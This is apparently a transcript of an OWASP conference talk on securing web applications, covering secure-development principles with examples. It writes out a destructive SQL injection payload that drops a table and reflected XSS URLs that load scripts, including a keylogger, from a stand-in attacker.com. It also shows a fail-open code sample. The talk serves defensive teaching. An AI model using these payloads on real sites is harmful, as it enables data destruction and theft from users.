How to secure web applications

Post on 01-Nov-2014


DESCRIPTION

I presented this presentation at the OWASP Hyderabad Oct 2012 meet. You can find more details at https://www.owasp.org/index.php/Hyderabad

Transcript

"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards."

- Gene Spafford

SECURING WEB APPLICATIONS

A BIRD'S EYE VIEW

Hello Everyone

# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member @imran_naseem

Imran Mohammed

Do you know ?

90% of companies got hacked last year

http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey

To name a few ...

60% got hacked twice

50% are unsure about this year

Myths of App Sec

Myth #1

We have network firewall & WAF

Myth #2

We have SSL hence we are secure

Myth #3

Testing team will handle security

Myth #4

Nobody will attack us, we are a small organization

"If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology."

- Bruce Schneier

Ten commandments of secure development

Input is evil, validate it

Validate input source, context, syntax and semantics of data, current and previous states

SQL Injection

Front-end: https://bookstore.com/index.php?authorname=James

Back-end: SELECT title,year FROM books WHERE author = 'James'

SQL Injection

Front-end: https://bookstore.com/index.php?authorname=James'; drop table books;--

Back-end: SELECT title,year FROM books WHERE author = 'James'; drop table books;-- '
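The bookstore query above, as an added example that is not the speaker's code: the slide's string concatenation run against a constructed in-memory SQLite catalogue, beside the parameterized form. The same payload drops the table in one case and is treated as a plain author name in the other (executescript stands in for a driver that accepts stacked statements).

```python
import sqlite3

# Constructed sample catalogue for the demo; not data from the slides.
BOOKS = [("Dubliners", 1914, "James"), ("Ulysses", 1922, "James"),
         ("Emma", 1815, "Jane")]
# The payload from the slide, exactly as it arrives in the authorname parameter.
PAYLOAD = "James'; drop table books;--"


def make_db():
    """In-memory bookstore database with a fresh books table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, year INTEGER, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    conn.commit()
    return conn


def table_exists(conn, name="books"):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


def build_vulnerable_query(authorname):
    """The slide's back-end: user input pasted straight into the SQL text."""
    return f"SELECT title,year FROM books WHERE author = '{authorname}'"


def search_vulnerable(conn, authorname):
    """Run the concatenated query as a driver that accepts stacked statements
    would: the injected DROP TABLE executes, the trailing -- hides the quote."""
    conn.executescript(build_vulnerable_query(authorname))


def search_safe(conn, authorname):
    """Hardened form: a bound parameter. The value is sent as data, so quotes
    and semicolons inside it never become SQL syntax."""
    return conn.execute(
        "SELECT title,year FROM books WHERE author = ? ORDER BY year",
        (authorname,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search_safe(db, "James"))              # both James titles
    print(search_safe(db, PAYLOAD))              # []: payload is just a name
    print("table survives:", table_exists(db))  # True
    search_vulnerable(db, PAYLOAD)
    print("table survives:", table_exists(db))  # False: books was dropped
```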

Cross Site Scripting - Functionality:

https://example.com/error.php?message=Sorry%2c+an+error+occurred

"Reflected" back to the client via webserver:

<p>Sorry, an error occurred.</p>

Any Problem ?

https://example.com/error.php?message=[can i change this ?]

Cross Site Scripting - Attack Users:

https://example.com/error.php?message=<script src="attacker.com/malicious.js"></script>

"Reflected" back to the client via webserver: <p><script src="attacker.com/malicious.js"></script>.</p>

More problems

https://example.com/error.php?message=<script src="attacker.com/keylogger.js"></script>

https://example.com/error.php?message=<script>document.location.href="badsite.com"</script>

POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
Host: www.example.com

q=sqli&hidden_field=20

Use cryptographically strong algorithms

Cookie: lang=english; sessionid=aW1yYW4=

Cookie: lang=english; sessionid=cmFnaHU=

Base64 is not encryption

http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a

MD5 is not good enough

Google it

Use SHA2 or better with salt

Minimize attack surface

Use Least privilege

Keep security simple

Keep design as simple and small as possible. Complex design is difficult to understand and secure.

Provide Defense in depth

Fail safely

    isAdmin = true;   // fails open: if codeWhichMayFail() throws, isAdmin is never reset
    try {
        codeWhichMayFail();
        isAdmin = isUserInRole( "Administrator" );
    }
    catch (Exception ex) {
        log.write(ex.toString());   // the exception is logged, but isAdmin is still true
    }

Avoid Security through obscurity

Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC

Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC

Fix Security issues correctly

Use Secure defaults

Remember scott/tiger?

and admin/password (router's admin panel)

Don't reinvent the wheel

How to develop/fix the code securely?

Follow Secure SDLC

OWASP Development Guide

Educate Developers/Users

Use OWASP ESAPI

Typical OWASP ESAPI Example

Thanks !

Questions ?

Credits: All icons are taken from the Noun Project

OWASP Project related Images are taken from owasp.org
